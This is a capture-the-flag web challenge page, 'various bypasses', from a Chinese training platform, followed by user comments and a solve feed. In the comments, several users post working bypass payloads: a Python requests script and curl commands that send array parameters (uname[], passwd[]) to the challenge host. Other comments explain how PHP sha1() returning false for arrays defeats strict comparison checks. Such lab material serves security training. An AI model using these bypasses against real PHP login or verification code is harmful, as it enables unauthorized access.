各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 5694
提  示:
描  述:
各种绕过
评论
YANGLINSHENG2503940126 4天前

import requests url = "http://160.202.254.160:18387 id=%6d%61%72%67%69%6e&uname[]=1" data = {"passwd[]": "2"} res = requests.post(url, data=data) print(res.text)

回复 0

WWls= 25天前

?uname[]=1&id=margin POST:passwd[]=2

回复 0

脚本gay 3月前

解题关键:PHP SHA1 函数漏洞 PHP 中,sha1() 函数无法处理数组,传入数组会返回 false,且是强类型的 false。 sha1(array()) → false sha1(array(1)) → false 两个不同数组,sha1 结果都是 false,满足 === 强相等 同时,数组和数组在 == 弱比较中不相等,完美绕过第一层判断!

回复 0

是小白鸭 4月前

明白咯 要在bp的repeater里面修改,get请求在头部,post请求在尾部。

回复 0

奔跑的开开 7月前

hackbar构造?uname[]=1&id=margin(get) ,passwd[]=2(post)

回复 2
qq1002517 4月前

6

回复 0

5883120xly 8月前

在url上加/?id=margin&uname[]=111a 在POST中加passwd[]=2

回复 3

lwgzs 8月前

curl -d '

回复 0

dbcjmc 8月前

这题其实很简单,要掌握MD5== 与===的特性就能轻松绕过去,在hackbar我们先传入get的?id=margin&uname[]=1然后再post传入passwd[]=2数组里面什么值都行===遇到数组都是null所以满足条件

回复 1

zxcvbnmzhang 10月前

curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

asddddd 10月前

我用0e绕过sha1为啥不行,为什么只能数组绕过

回复 0
ShawnWang04 8月前

因为是=== 不是==

回复 0

WriteUp

image
harry

3 金币

评分(5)

解题动态

tonghow 攻破了该题 10小时前
z231288 攻破了该题 17小时前
纳猫猫 攻破了该题 19小时前
billy856 攻破了该题 19小时前
rschei7 攻破了该题 21小时前
byj 攻破了该题 23小时前
zwx1998 攻破了该题 1天前
小鱼牌西红柿 攻破了该题 1天前
gfgfgf 攻破了该题 1天前
abccc 攻破了该题 1天前
w84jhjfa9 攻破了该题 2天前
heinic 攻破了该题 2天前
yiyiyiyi0108 攻破了该题 2天前
CN19169645762 攻破了该题 2天前
f发条橙1515 攻破了该题 2天前
白嘎力 攻破了该题 2天前
bbb.. 攻破了该题 2天前
tay 攻破了该题 2天前
刘猛 攻破了该题 2天前
董春昊 攻破了该题 2天前
问题反馈